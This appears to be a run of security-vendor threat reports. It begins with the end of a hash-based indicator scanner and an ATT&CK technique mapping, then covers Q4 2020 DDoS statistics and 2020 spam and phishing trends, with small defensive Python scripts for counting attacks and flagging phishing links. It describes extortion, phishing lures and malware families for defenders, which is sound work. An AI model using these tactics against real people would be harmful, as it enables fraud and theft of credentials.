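        "harmless.txt": b"hello",
        "sample.bin": b"constructed: hash match only",
    }
    for name, data in files.items():
        with open(os.path.join(root, name), "wb") as f:
            f.write(data)
    return {"root": root, "sample_md5": hashlib.md5(files["sample.bin"]).hexdigest()}


if __name__ == "__main__":
    tree = build_demo_tree()
    extended = dict(KNOWN_MD5, **{tree["sample_md5"]: "Constructed test indicator"})
    for finding in scan_tree(tree["root"], known_md5=extended):
        print(finding["kind"], finding["name"], "->", finding["label"])
```

A name match alone is a lead rather than a verdict (several of the report’s paths reuse plausible Windows names), whereas a hash match against the appendix is conclusive for that sample; the registry keys listed under “Registry Path” are not covered here and would be checked separately with the Windows registry API.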

Appendix II – MITRE ATT&CK Mapping

Tactic | Technique | Technique Name
Initial Access | T1566.002 | Phishing: Spearphishing Link
Execution | T1059.003 | Command and Scripting Interpreter: Windows Command Shell
Execution | T1204.002 | User Execution: Malicious File
Execution | T1569.002 | System Services: Service Execution
Persistence | T1543.003 | Create or Modify System Process: Windows Service
Persistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Privilege Escalation | T1543.003 | Create or Modify System Process: Windows Service
Defense Evasion | T1140 | Deobfuscate/Decode Files or Information
Defense Evasion | T1070.002 | Clear Linux or Mac System Logs
Defense Evasion | T1070.003 | Clear Command History
Defense Evasion | T1070.004 | File Deletion
Defense Evasion | T1036.003 | Masquerading: Rename System Utilities
Defense Evasion | T1036.004 | Masquerading: Masquerade Task or Service
Defense Evasion | T1112 | Modify Registry
Credential Access | T1557.001 | LLMNR/NBT-NS Poisoning and SMB Relay
Discovery | T1135 | Network Share Discovery
Discovery | T1057 | Process Discovery
Discovery | T1016 | System Network Configuration Discovery
Discovery | T1033 | System Owner/User Discovery
Discovery | T1049 | System Network Connections Discovery
Discovery | T1082 | System Information Discovery
Discovery | T1083 | File and Directory Discovery
Discovery | T1007 | System Service Discovery
Lateral Movement | T1021.002 | SMB/Windows Admin Shares
Collection | T1560.001 | Archive Collected Data: Archive via Utility
Command and Control | T1071.001 | Application Layer Protocol: Web Protocols
Command and Control | T1132.002 | Non-Standard Encoding
Command and Control | T1104 | Multi-Stage Channels
Command and Control | T1572 | Protocol Tunneling
Command and Control | T1090.001 | Internal Proxy
Exfiltration | T1041 | Exfiltration Over C2 Channel

February 16, 2021

DDoS attacks in Q4 2020

News overview

Cybercriminals are constantly on the lookout for means and methods to make attacks more destructive. In Q4 2020, Citrix ADC (application delivery controller) devices became one such tool, when perpetrators abused their DTLS interface. The DTLS (Datagram Transport Layer Security) protocol is used to establish secure connections over UDP, through which most DNS queries, as well as audio and video traffic, are sent. To amplify the attack, the attackers sent requests to devices with the DTLS interface enabled, spoofing victims’ IP addresses. Consequently, the victims received reply packets several times larger in size. In the case of Citrix devices, the amount of junk traffic could increase by up to 36 times. After the attacks came to light, the manufacturer promptly released a firmware update for configuring verification of incoming requests. For those who do not use DTLS, it is recommended to simply disable this protocol.

Another notable attack in December targeted the website Bitcoin.org, which hosts Bitcoin Core, one of the most widely used software versions of bitcoin. While the resource was down, cryptocurrency newbies were invited to download a copy of Bitcoin Core via a torrenting service. Most likely, the attack is related to the bitcoin price, which has steadily risen over the past quarter. According to one of the developers behind Bitcoin.org, the site is always hit whenever bitcoin is on the up.

Overall, Q4 remained within the parameters of 2020 trends. Cybercriminals used the names of well-known APT groups to intimidate victims, demanded ransoms in cryptocurrency, and carried out demonstration attacks to back up their threats. Extortionists’ activity regularly made the news throughout 2020. In October, telecommunications firm Telenor Norway was another to fall victim.

Since the transition of schools and universities to remote learning, cybercriminals have tried to disrupt classes by flooding educational platforms with garbage traffic. This trend continued in the last months of 2020. In October, schools in Sandwich and Tyngsboro, Massachusetts, suffered network outages. In both cases, the institutions initially put the incident down to technical failure, and only later discovered the attack. In December, Canada’s Laurentian University reported a DDoS attack. But it dealt with the problem in a matter of minutes. Still, such attacks by year’s end were serious enough for the FBI to flag them in its December advisory as a major threat to teaching facilities. Educational institutions are recommended to use anti-DDoS solutions and strong firewall settings, and partner up with ISPs.

Gaming platforms didn’t escape cybercriminal attention either. According to ZDNet, Xbox and Steam were the targets of amplification attacks through Citrix devices. In early October, a DDoS attack was reported by the PUBG Mobile team.

Dear players,

The PUBG MOBILE team are currently actively working to resolve the DDoS attacks against our systems and the new hacking issues. For information, please check out here: https://t.co/DMYsxWTlCc

— PUBG MOBILE (@PUBGMOBILE) October 3, 2020

And Blizzard’s European servers were hit by threat actors twice in the quarter.

We are currently experiencing a DDoS attack, which may result in high latency and disconnections for some players. We are actively working to mitigate this issue #BlizzCS

— Blizzard CS EU (@BlizzardCSEU_EN) October 2, 2020

In late December, several dozen top streamers planned to celebrate the end of 2020 playing through Rust all on the same server. The show failed at the first attempt, apparently due to a DDoS attack, although there is no reliable data on this. Given the hype surrounding the event, it may have been caused by an influx of fans tuning in. In 2020, when much of life shifted online, internet resources repeatedly suffered from surges in totally legitimate activity.

As for the fightback, the most notable Q4 event was the conviction of a former Apophis Squad member responsible for a string of DDoS attacks, including for ransom, as well as for disrupting school classes worldwide through fake bomb alerts, and for storing child pornography. For his efforts, the perpetrator was sentenced to eight years in prison.

The resistance against individual attack vectors also continues. The Internet Engineering Task Force (IETF) published a proposal for Network Time Security (NTS), a secure standard for data transmission over the Network Time Protocol (NTP), which is used to synchronize time across a network. The document addresses, in particular, the problem of DDoS amplification through this protocol and prohibits the sending, in response to a request, of data packets larger than the request packet.

Quarter and year trends

This time, our forecasts were exactly 50% accurate: as expected, in Q4 2020 we observed indicators comparable to those for the same period in 2019, and even slightly higher. However, growth relative to Q3 2020, which we predicted as a possible alternative, did not occur. On the contrary, the total number of attacks fell by about 30%, and smart attacks by 10%.


Comparative number of DDoS attacks, Q3/Q4 2020 and Q4 2019; data for Q4 2019 is taken as 100% (download)

All the same, the qualitative indicators are noteworthy: the share of smart attacks increased slightly in Q4, and the data on attack duration showed a downward trend for short attacks and an upward trend for long ones.

Share of smart attacks, Q3/Q4 2020 and Q4 2019

Duration of DDoS attacks, Q3/Q4 2020 and Q4 2019; data for Q4 2019 is taken as 100%

The drop in the number of DDoS attacks can be explained by growth in the cryptocurrency market. We have already noted several times, including in the previous report, the inverse relationship between DDoS activity and cryptocurrency prices. When we made our Q4 forecasts, hardly anyone expected such rapid, frankly unprecedented growth. Unsurprisingly, then, botnet operators turned some of their capacity over to mining.

Interestingly, the noticeable fall in the number of DDoS attacks compared to the previous quarter came at the expense of easy-to-organize attacks, while smart attacks declined only slightly. This is perfectly logical: it is unprofitable for botnet operators to sell capacity on the cheap and lose out on mining profits, so when prices rise, the first customers to be cut loose are amateurs (schoolkids, pranksters, hotheads) who have no real reason to organize a DDoS attack. Professionals' interests, by contrast, are unaffected by market fluctuations, especially in Q4 with its many holidays and online sales, so they continue to order and carry out attacks, mostly smart ones, because they are focused on the result rather than the attempt.

What Q1 2021 will bring is hard to say. However, we are becoming increasingly convinced that the DDoS market has stopped growing, having completely stabilized after the decline in 2018. The current fluctuations are mainly due to the dynamics of cryptocurrency prices, and will depend directly on them going forward. If cryptocurrencies begin to fall in price in Q1 2021, the number of DDoS attacks will rise, and vice versa. At the same time, we do not expect to see any explosive growth or dramatic fall. Barring the unexpected (although the unexpected was the name of the game last year), DDoS market fluctuations will remain within 30%.

Comparative number of DDoS attacks, 2019 and 2020; data for 2019 is taken as 100%

As for the results of 2020 as a whole, the market slightly less than doubled over the year. Note that this growth is purely quantitative: the share of smart attacks remained practically unchanged.

Share of smart attacks, 2019 and 2020

The attack duration data is of particular interest. In 2020, the average duration decreased by roughly a third, while the maximum increased noticeably overall, despite remaining almost on a par with last year in the case of smart attacks. This suggests that short attacks are getting shorter and long ones longer; we saw a similar trend in Q4. Although the reasons are hard to pinpoint, we can assume, as with every other trend last year, that it is related to the pandemic, the serious global instability and the eruptive growth in the cryptocurrency market. The DDoS market is changing under the influence of these factors, as too are the targets of attacks and those who order them, and with them the average attack duration.

Duration of DDoS attacks, 2019 and 2020; data for 2019 is taken as 100%

Statistics Methodology

Kaspersky has a long history of combating cyber threats, including DDoS attacks of all types and complexity. Company experts monitor botnets using the Kaspersky DDoS Intelligence system.

A part of Kaspersky DDoS Protection, the DDoS Intelligence system intercepts and analyzes commands received by bots from C&C servers. The system is proactive, not reactive, meaning that it does not wait for a user device to get infected or a command to be executed.

This report contains DDoS Intelligence statistics for Q4 2020.

In the context of this report, an incident is counted as a single DDoS attack only if the interval between botnet activity periods does not exceed 24 hours. For example, if the same web resource was attacked by the same botnet with an interval of 24 hours or more, this is counted as two attacks. Bot requests originating from different botnets but directed at one resource also count as separate attacks.

The geographical locations of DDoS-attack victims and C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.
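The counting rules above (same target and same botnet, activity periods merged while the gap stays under 24 hours, different botnets counted separately, targets counted as unique IP addresses) are straightforward to implement, and doing so makes the duration figures later in the report easier to interpret. The following is an added example, not Kaspersky's DDoS Intelligence code, run over constructed activity periods; the input layout is an assumption of this example.

```python
from datetime import datetime, timedelta

# Gap at or above this value starts a new attack (the "24 hours or more" clause).
GAP_LIMIT = timedelta(hours=24)

# Constructed sample of botnet activity periods, not real DDoS Intelligence data:
# (target IP, botnet id, activity start, activity end), local time.
SAMPLE_ACTIVITY = [
    ("203.0.113.5", "botnet-A", "2020-10-20 08:00", "2020-10-20 10:00"),
    ("203.0.113.5", "botnet-A", "2020-10-21 06:00", "2020-10-21 07:00"),  # 20 h gap: same attack
    ("203.0.113.5", "botnet-A", "2020-10-23 09:00", "2020-10-23 12:00"),  # 50 h gap: new attack
    ("203.0.113.5", "botnet-B", "2020-10-20 09:00", "2020-10-20 11:00"),  # other botnet: separate
    ("203.0.113.9", "botnet-A", "2020-10-20 12:00", "2020-10-20 13:00"),
]


def _parse(ts):
    return datetime.strptime(ts, "%Y-%m-%d %H:%M")


def group_attacks(activity):
    """Merge activity periods into attacks.

    Periods with the same (target, botnet) are sorted by start time and
    merged while the idle gap between them is shorter than GAP_LIMIT.
    Returns a list of (target, botnet, attack_start, attack_end).
    """
    by_key = {}
    for target, botnet, start, end in activity:
        by_key.setdefault((target, botnet), []).append((_parse(start), _parse(end)))

    attacks = []
    for (target, botnet), periods in by_key.items():
        periods.sort()
        cur_start, cur_end = periods[0]
        for start, end in periods[1:]:
            if start - cur_end < GAP_LIMIT:
                cur_end = max(cur_end, end)      # still the same attack
            else:
                attacks.append((target, botnet, cur_start, cur_end))
                cur_start, cur_end = start, end  # idle for 24 h or more: new attack
        attacks.append((target, botnet, cur_start, cur_end))
    return attacks


def summarize(activity):
    """Attack count, unique targets by IP, and duration statistics in hours."""
    attacks = group_attacks(activity)
    durations = [(end - start).total_seconds() / 3600 for _, _, start, end in attacks]
    return {
        "attacks": len(attacks),
        "unique_targets": len({target for target, _, _, _ in attacks}),
        "max_duration_h": max(durations),
        "avg_duration_h": sum(durations) / len(durations),
    }


if __name__ == "__main__":
    for target, botnet, start, end in group_attacks(SAMPLE_ACTIVITY):
        print(f"{target} by {botnet}: {start} -> {end}")
    print(summarize(SAMPLE_ACTIVITY))
```

Note that a merged attack's duration runs from the first period's start to the last period's end, idle gaps included, which is one reason a handful of intermittent campaigns can stretch the maximum duration figure well beyond any single burst.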

DDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky. Note that botnets are just one of the tools used for DDoS attacks, and that this section does not cover every single DDoS attack that occurred during the review period.

Note that Q4 2020 saw a rise in the number of botnets whose activity is included in the DDoS Intelligence statistics. This may be reflected in the data presented in this report.

Quarter summary

  • In Q4, as before, China (58.95%), the US (20.98%) and Hong Kong (3.55%) led the pack by number of DDoS attacks.
  • Ditto the TOP 3 regions by number of targets: China (44.49%), the US (23.57%) and Hong Kong (7.20%).
  • On the “quietest” days, the number of DDoS attacks did not exceed one per day.
  • The most active day of the quarter in terms of DDoS was December 31, which recorded 1,349 attacks.
  • We saw the most DDoS attacks this quarter on Thursdays, and the fewest on Sundays.
  • The shares of very short attacks (71.63%) and very long attacks (0.14%) decreased in Q4, while the shares of all intermediate categories increased.
  • Q4 reshuffled the distribution of DDoS attacks by type: UDP flooding returned to second place (15.17%), and GRE flooding, previously unmentioned in our reports, became the fourth most common (0.69%).
  • Linux botnets were used in almost 100% of attacks.
  • The majority of botnet C&C servers were located in the US (36.30%), the Netherlands (19.18%) and Germany (8.22%).

Attack geography

The TOP 3 countries by number of DDoS attacks in Q4 2020 remained the same as in the previous reporting period. China is still top (58.95%), but its share fell by 12.25 p.p. Second place goes to the US (20.98%), whose share, in contrast, climbed by 5.68 p.p. We observed a similar pattern, a decline in China's share and an increase in the US share against Q3, in the last three months of 2019.

Despite losing 0.92 p.p., the Hong Kong Special Administrative Region (3.55%) clung on to third place, which it has not vacated since the beginning of 2020. This is where the similarity with the Q3 picture ends: Singapore, fourth in the last reporting period, dropped out of the TOP 10. It was replaced by the UK (1.99%), which gained 1.72 p.p.

The fifth line is occupied by South Africa (1.31%), displacing Australia (0.97%), which dropped to seventh, despite increasing its share by 0.32 p.p.; Canada (1.04%) ranked sixth after missing out on the TOP 10 in Q3.

The Netherlands moved down one position to eighth (0.86%). India and Vietnam, like Singapore, left the TOP 10. The ranking is rounded out by Germany (0.71%) and France (0.64%), which both fell short of the Q3 TOP 10.

Distribution of DDoS attacks by country, Q3 and Q4 2020

The TOP 10 countries list by number of DDoS targets is traditionally similar to the ranking by number of attacks. The three leaders are the same: ahead is China (44.49%), whose share decreased by 28.34 p.p. but remains unchallenged. Second is the US (23.57%), whose share increased by 7.82 p.p., and in third place is Hong Kong (7.20%).

South Africa failed to make the TOP 10 by number of targets, but Singapore (2.21%) did, despite dropping out of the ranking by number of attacks. Although its share increased by 1.74 p.p., it lost ground relative to Q3 and moved down to fifth place, because all the TOP 10 countries except China increased their share. For instance, the fourth-placed Netherlands (4.34%) grew by 4.07 p.p.

As for countries lower down, only their order of appearance distinguishes this list from the ranking by number of attacks. Canada (1.97%) outstrips the UK (1.77%), while Australia (1.29%) places last, behind France (1.73%) and Germany (1.62%).

Distribution of unique DDoS-attack targets by country, Q3 and Q4 2020

Dynamics of the number of DDoS attacks

As expected, Q4 was more turbulent than its predecessor. The start of the reporting period was quite calm: on October 3–6, we observed only one attack per day. However, come October 20, 347 attacks were recorded, which exceeds the Q3 maximum (323 attacks in one day). In late October and November, DDoS activity fluctuated between close to zero and 200 attacks per day.

The last days of November saw the start of significant growth, which continued through quarter’s end, most likely due to the increase in the number of botnets monitored by Kaspersky, as well as the Christmas and New Year vacations, the runup to which is usually accompanied by a spike in cybercriminal activity. The overall rise in online shopping (holiday-related and other) probably also played a role. The hottest day in terms of DDoS this quarter was December 31, with 1,349 attacks recorded worldwide.

Dynamics of the number of DDoS attacks, Q4 2020

In Q4, Thursday remained the most active day of the week (17.67%), although its share dropped by 1.35 p.p. against the previous quarter. But the title of quietest day changed hands again: this time, cybercriminals preferred to put their feet up on Sundays (11.19%). What’s more, the spread in the number of attacks on “calm” and “stormy” days narrowed to 6.48 p.p., down from almost 9 p.p. last quarter. In the last three months of the year, the number of attacks conducted on Tuesdays, Wednesdays and Fridays increased, and for other weekdays, decreased.

Distribution of DDoS attacks by day of the week, Q3 and Q4 2020

Duration and types of DDoS attacks

The average duration of DDoS attacks in Q4 increased relative to the previous reporting period. This can be attributed to the significant decline in the share of very short attacks lasting under four hours (71.62% versus 91.06% in Q3), as well as the increase in the number of longer attacks. Specifically, the share of attacks lasting 5–9 (11.78%), 10–19 (8.40%), 20–49 (6.10%), 50–99 (1.86%) and 100–139 (0.10%) hours increased this quarter.

In contrast, the share of ultra-long attacks decreased by 0.09 p.p. to 0.14%, yet remained higher than the share of attacks lasting 100–139 hours, while the duration of the longest attack exceeded 12 days (302 hours), which is noticeably longer than the Q3 maximum (246 hours).

Distribution of DDoS attacks by duration (hours), Q3 and Q4 2020

The distribution of DDoS attacks by type changed dramatically in Q4. The lead is still held by SYN flooding, but its share fell by 16.31 p.p. to 78.28%. Meanwhile, the share of UDP flooding shot up (15.17%), having been under 2% in the first three quarters. TCP attacks (5.47%) also increased in number, but ICMP flooding, previously ranked second after SYN attacks, was negligible in Q4, so we did not include it in the statistics.

Instead, a type of attack previously unmentioned in our reports, GRE flooding (0.69%), showed up on the Q4 radar. GRE (Generic Routing Encapsulation) is a traffic-tunneling protocol used primarily for creating virtual private networks (VPNs). GRE flooding was employed, for instance, by the Mirai botnet to attack the blog of journalist Brian Krebs in 2016.

Distribution of DDoS attacks by type, Q4 2020

This quarter, for the first time since our observations began, the share of Windows botnets fell to almost zero (0.20%). Almost all recorded DDoS attacks were carried out using Linux-based bots.

Ratio of Windows/Linux botnet attacks, Q3 and Q4 2020

Botnet distribution by country

The bulk of C&C servers in control of DDoS botnets in Q4 2020 were located in the US, which accounted for 36.30% of the total number of servers. In second place was the Netherlands with a 19.18% slice. Germany completes the TOP 3 with 8.22%.

Romania came fourth by number of C&C servers (4.79%), while fifth and sixth positions were shared by France and the UK, both on 4.11%. This quarter’s seventh-, eighth- and ninth-ranking countries likewise had the same share: Canada, Hungary and Vietnam all posted 3.42%. China (2.05%) wraps up the TOP 10 countries by number of recorded botnet C&C servers.

Distribution of botnet C&C servers by country, Q4 2020

Conclusion

Q4 was both ordinary and extraordinary. On the one hand, there were no unexpected changes in the geographical distribution of DDoS attacks and targets; on the other, the distribution by attack type shifted radically: the share of UDP flooding was up; ICMP attacks were displaced by GRE flooding. In addition, for the first time in our observation history, Linux botnets have almost totally captured the DDoS market.

We would very much like to see the data for an alternative 2020 — one with no pandemic, no dramatic cryptocurrency growth, no shocks to the DDoS market. The coronavirus outbreak spurred the market (see our Q1 and Q2 reports), while the cryptocurrency upswing curbed it (see our Q3 report). Perhaps these opposing forces ultimately canceled each other out, and the picture would have been similar without them, but in 2020 they combined to create a perfect storm on the DDoS market, blowing half of our predictions off course.

It is hard to guess what to expect in 2021 — we cannot predict how the pandemic or cryptocurrency prices will behave. Therefore, our forecast is very tentative: no sharp shocks will equal little change on the DDoS market. We see no preconditions for major growth or decline, both in Q1 and throughout 2021. The watchword is stability, which is what we expect.

15 February 2021

Spam and phishing in 2020

Figures of the year

In 2020:

  • The share of spam in email traffic amounted to 50.37%, down by 6.14 p.p. from 2019.
  • Most spam (21.27%) originated in Russia.
  • Kaspersky solutions detected a total of 184,435,643 malicious attachments.
  • The email antivirus was triggered most frequently by email messages containing members of the Trojan.Win32.Agentb malware family.
  • The Kaspersky Anti-Phishing component blocked 434,898,635 attempts at accessing scam sites.
  • The most frequent targets of phishing attacks were online stores (18.12%).

Trends of the year

Contact us to lose your money or account!

In their email campaigns, scammers who imitated major companies, such as Amazon, PayPal, Microsoft, etc., increasingly tried to get users to contact them. Various pretexts were given for requesting the user to get in touch with “support”: order confirmation, resolving technical issues, cancellation of a suspicious transaction, etc. All of these messages had one thing in common: the user was requested to call a support number stated in the email. Legitimate messages constantly warn recipients of the dangers of opening links that arrive by email, so an offer to call back was supposed to put the addressees off their guard. Toll-free numbers were intended to add further credibility, as the support services of large companies often use these. The scammers likely expected their targets to use the provided phone number to get help instantly in a critical situation, rather than to look for a contact number or wait for a written response from support.

The contact phone trick was heavily used both in email messages and on phishing pages. The scammers were simply betting that the visitor would focus on the number and the unsettling warning message against the red background rather than on the address bar of the fake website.

We assume that those who called the numbers were asked to provide the login and password for the service that the scammers were imitating, or to pay for some diagnostics and troubleshooting services.

Reputation, bitcoins or your life?

In 2020, Bitcoin blackmailers stuck to their old scheme, demanding that their victims transfer money to a certain account and threatening adversity for failure to meet their demands. Threats made by extortionists grew in diversity. In most cases, scammers, as before, claimed to have used spyware to film the blackmail victim watching adult videos. In a reflection of the current trends for online videoconferencing, some email campaigns claimed to have spied on their victims with the help of Zoom. This year, too, blackmailers began to take advantage of news sensations to add substance to their threats. This is very similar to the techniques of “Nigerian” scammers, who pose as real political figures or their relatives, offering tons of money, or otherwise link their messages with concurrent global events. In the case of bitcoin blackmail, the media component was supposed to be a strong argument in the eyes of the victim for paying the ransom without delay, so cybercriminals cited the example of media personalities whose reputation suffered because of an explicit video being published.

This year, we have seen threats made against companies, too. A company was told to transfer a certain amount to a Bitcoin wallet to prevent a DDoS attack that the cybercriminals threatened to unleash upon it. They promised to provide a demonstration to prove that their threats were real: no one would be able to use the services, websites or email of the company under attack for thirty minutes. Interestingly, the cybercriminals did not limit their threats to DDoS. As with blackmail aimed at individuals, they promised to damage the company’s reputation even more, should it fail to pay up, by stealing confidential information, specifically, its business data. The attackers introduced themselves as well-known APT groups to add weight to their threats. For example, in the screenshot below, they call themselves Venomous Bear, also known as Waterbug or Turla.

The senders of an email about a bomb planted in a company's offices went much further with their threats. The amount demanded by the blackmailers was much larger than in previous messages: $20,000. To make their threats sound convincing enough, the cybercriminals provided details of the “attack”: an intention to detonate the bomb if the police intervened, the substance used, the explosive yield and plans to threaten other blackmail victims with the explosion.

Attacks on the corporate sector

Theft of work accounts and infection of office computers with malware in targeted attacks were the main risks that companies faced this year. Messages that imitated business email or notifications from major services offered to view a linked document or attached HTML page. Viewing the file required entering the password to the recipient's corporate email account.

Reasons given for asking users to open a link or attachment varied: a need to install an update, unread mail, quarantined mail or unread chat messages. The cybercriminals created web pages designed to look like they belonged to the company under attack. URL parameters containing the corporate email address were pushed into the fake page with the help of JavaScript, so the user saw a unique page with a pre-entered email address and a design imitating the company's corporate style. The appearance of that page could lull the potential victim into a false sense of security, as all they needed to do was enter their password.

In this type of attack, scammers began to make broader use of “voice messages”. The appearance of the messages imitated business email.
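The pre-filled address is also a useful detection signal for a mail gateway: a link that carries the recipient's own corporate address in its query string or fragment is a strong hint that the landing page will greet them by name and ask only for a password. The check below is an added example, not Kaspersky's or any vendor's filter; the message, the URLs and the regular expressions are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed message body for the example, not a real sample.
SAMPLE_MESSAGE = """\
Subject: 3 messages held in quarantine

Review them here: https://mail-review.example.net/login?user=jane.doe%40example.com&ref=qtn
Play the voice message: https://vm-player.example.net/play/#jane.doe@example.com
Or download the update: https://updates.example.org/patch
"""

# Deliberately simple matchers; a production gateway would use its URL
# extractor and an RFC-aware address parser instead.
URL_RE = re.compile(r"https?://[^\s<>\"']+")
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def extract_urls(body):
    """All http(s) URLs in the message text, in order of appearance."""
    return URL_RE.findall(body)


def emails_in_url(url):
    """Email addresses embedded in the query string or fragment of a URL.

    Both places are checked because the fragment is never sent to the web
    server, which makes it a convenient spot to hand the address to
    client-side JavaScript without it showing up in server logs.
    """
    parsed = urlparse(url)
    found = set()
    for values in parse_qs(parsed.query, keep_blank_values=True).values():
        for value in values:
            found.update(EMAIL_RE.findall(unquote(value)))
    found.update(EMAIL_RE.findall(unquote(parsed.fragment)))
    return found


def suspicious_links(body, recipient):
    """Links in body that embed the recipient's own address (prefill pattern)."""
    wanted = recipient.lower()
    hits = []
    for url in extract_urls(body):
        if wanted in {addr.lower() for addr in emails_in_url(url)}:
            hits.append(url)
    return hits


if __name__ == "__main__":
    for url in suspicious_links(SAMPLE_MESSAGE, "jane.doe@example.com"):
        print("recipient address embedded in link:", url)
```

Legitimate mail (unsubscribe and account-management links) embeds addresses too, so treat a hit as one weighted signal alongside sender authentication results and domain reputation rather than as a verdict on its own.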

The link could lead directly to a phishing site, but there also was a more complex scenario, in which the linked page looked like an audio player. When the recipient tried playing the file, they were asked to enter the credentials for their corporate mailbox.

Demand for online videoconferencing amid remote work led to a surge in fake online meeting invitations. A distinctive feature that should have alarmed the recipients of the fake invitations was the information the page asked them to enter in order to join the meeting. To access a real Zoom meeting, you need to know the meeting ID and password. The fake videoconference links opened fake Microsoft and WeTransfer pages containing fields for the login and password of a work account.

Messengers targeted

Scammers who were spreading their chain mail via social networks and instant messaging applications began to favor the latter. Message recipients, mostly in WhatsApp, were promised a discount or prize if they opened a link sent to them. The phishing web page contained a tempting message about a money prize, award or other, equally desirable, surprises.

The recipient had to fulfill two conditions: answer a few simple questions or fill out a questionnaire, and forward the message to a certain number of their contacts. The victim thus became a link in the spam chain, and subsequent messages were sent from a trusted address, avoiding anti-spam filters.

Besides that, a message from someone the recipient knew carried much more credibility. Thus the chain kept growing, and the scammers went on enriching themselves. Even if the victim did fulfill the conditions, getting the promised prize proved not so simple, as the “lucky” recipient was urged to pay a bank commission.

COVID-19 “Public relief” by spammers

Many governments did their best to help citizens during the pandemic. That initiative, together with the fact that people on the whole were willing to get payouts, became a theme for spam campaigns. Both individuals and companies were exposed to the risk of being affected by cybercriminals’ schemes.

Messages offering financial aid to businesses hurt by the pandemic or to underprivileged groups could crop up in social media feeds or arrive through instant messaging networks. The main requirement for getting the funds was filling out a detailed personal questionnaire. Those who took the step found that a small commission was required as well. Real government payouts these days are made through public portals that also serve other purposes and do not require additional registration, questionnaires or commissions.

Cybercriminals who offered tax deductions to companies employed a similar scheme. As in the examples above, the reason provided for the easing of tax policy was the pandemic, and in particular, anticipation of a second wave of COVID-19.

However, offers of tax deductions and compensations were hiding not just the danger of losing money but losing one’s account to the scammers, too, as many of the messages contained phishing links.

Malicious links

Email campaigns that promised compensation could also threaten computer security. Messages in Turkish, like those mentioned earlier, offered a payout from Turkey's Ministry of Health (not always mentioned by name), but getting the money required downloading and installing an APK file on the recipient's smartphone. The attack targeted Android users, and the downloadable application contained a copy of Trojan-Dropper.AndroidOS.Hqwar.cf.

A fear of being infected with a new virus and a desire to know as much as possible about it could prompt recipients to review the email and open the links that it contained, as long as the message had been sent by a well-known organization. Fake letters from the WHO purporting to contain the latest safety advice were distributed in a variety of languages. The attachment contained files with various extensions. When the recipient tried to open these, malware was loaded onto the computer. In the message written in English, the attackers spread the Backdoor.Win32.Androm.tvmf, and in the one written in Italian, the Trojan-Downloader.MSOffice.Agent.gen.

Viral postal services

COVID-19 was also mentioned in fake email messages that mimicked notifications from delivery services. The sender said that there was a problem with delivering an order due to the pandemic, so the recipient needed to print out the attachment and take it to the nearest DHL office. The attached file contained a copy of the HEUR:Trojan.Java.Agent.gen.

The corporate sector

Spam that targeted companies also exploited the COVID-19 theme, but the cybercriminals occasionally relied on different kinds of tricks. For example, one of the emails stated that technical support had created a special alert system to minimize the risk of a new virus infection. All employees were required to log in to this system using their corporate account credentials and review their schedules and tasks. The link opened a phishing page disguised as the Outlook web interface.

In another instance, scammers were sending copies of the HEUR:Trojan-PSW.MSIL.Agensla.gen in the form of an email attachment. The scammers explained that the recipient needed to open the attached file, because the previous employee, who was supposed to send the “documentation”, had quit over COVID-19, and the papers had to be processed within three days.

“Nigerian” crooks making money from the pandemic

Email from “Nigerian” scammers and fake notifications of surprise lottery winnings regularly tapped the pandemic theme. The message in Korean shown below says that the recipient’s email address had been selected randomly by some center in Istanbul for a coronavirus-related emergency payout. Such surprise notices of winnings and compensations were generally sent out in a variety of languages. Messages from some lucky individuals who had won a huge sum and wished to support their fellow creatures in the difficult times of the pandemic were another variation on the “Nigerian” scam.

Where messages were signed as being from a lawyer trying to find a new owner for no-man’s capital, the sender emphasized that the late owner of the fortune had died of COVID-19.

An unusual turn of events

Regular “Nigerian” scam email is easy to recognize: it talks about millionaires or their relatives trying to inherit a huge fortune or bequeath it to someone who bears the same last name. The public seems to have become so accustomed to that type of junk mail that it has ceased to react, so cybercriminals have come up with a new cover story. To avoid being found out right away, they refrain from mentioning astronomical sums of money, instead posing as a mother from Russia who is asking for help with her daughter's effort to collect postcards from around the world. The key point of this kind of message is to get the potential victim to reply: the “mother's” request sounds absolutely innocent and easy to do, so it can resonate with recipients. If the victim agrees to send a postcard, they are in for a lengthy email exchange with the scammers, who will offer them a share in a large sum of money in exchange for a small upfront fee.

“Nigerian” scammers are not the only ones that have been getting creative. Spammers who sent out their messages through website feedback forms employed yet another unusual trick. The messages were signed as being from an outraged graphic artist or photographer, their names changing with each new message. The sender insisted that the website contained their works and thus violated their copyright, and demanded that the content be taken down immediately, threatening legal action.

The deadline for meeting the demand was quite tight, as the scammers needed the victim to open the link as soon as possible while pondering the consequences of that action as little as possible. A law-abiding site owner was likely to do just that. This is confirmed by related discussions in various blogs, with users reporting that they immediately tried checking what photographs they had “stolen”. The links were no longer functional by the time the “complaints” were discovered, but in all likelihood they had previously led to malicious files or phishing pages.

Statistics: spam

Proportion of spam in email traffic

The share of spam in global email traffic in 2020 was down by 6.14 p.p. when compared to the previous reporting period, averaging 50.37%.

Proportion of spam in global email traffic, 2020

The percentage of junk mail gradually decreased over the year, with the highest figure (55.76%) recorded in January and the lowest (46.83%), in December. This may be due to the universal transition to remote work and a resulting increase in legitimate email traffic.

Sources of spam by country

The group of ten countries where the largest volumes of spam originated changed noticeably in 2020. The United States (10.47%) and China (6.21%), which had held first and second places in the previous three years, dropped to third and fourth. The “leader” was Russia, which was the source of 21.27% of all spam email in 2020. It was followed by Germany (10.97%), which was just 0.5 percentage points ahead of the United States.

Sources of spam by country in 2020

France gained 2.97 p.p. compared to 2019, remaining fifth with 5.97%, while Brazil lost 1.76 p.p. and sank to seventh place with 3.26%. The other countries in last year’s “top ten”, India, Vietnam, Turkey and Singapore, dropped out, giving way to the Netherlands (4.00%), which jumped to sixth place, Spain (2.66%), Japan (2.14%) and Poland (2.05%).

Malicious email attachments

Attacks blocked by the email antivirus in 2020

In 2020, our solutions detected 184,435,643 dangerous email attachments. The peak in malicious activity, 18,846,878 email attacks blocked, came in March, while December was the quietest month, with 11,971,944 malicious attachments, as it had been in 2019.

Malware families

TOP 10 malware families in 2020

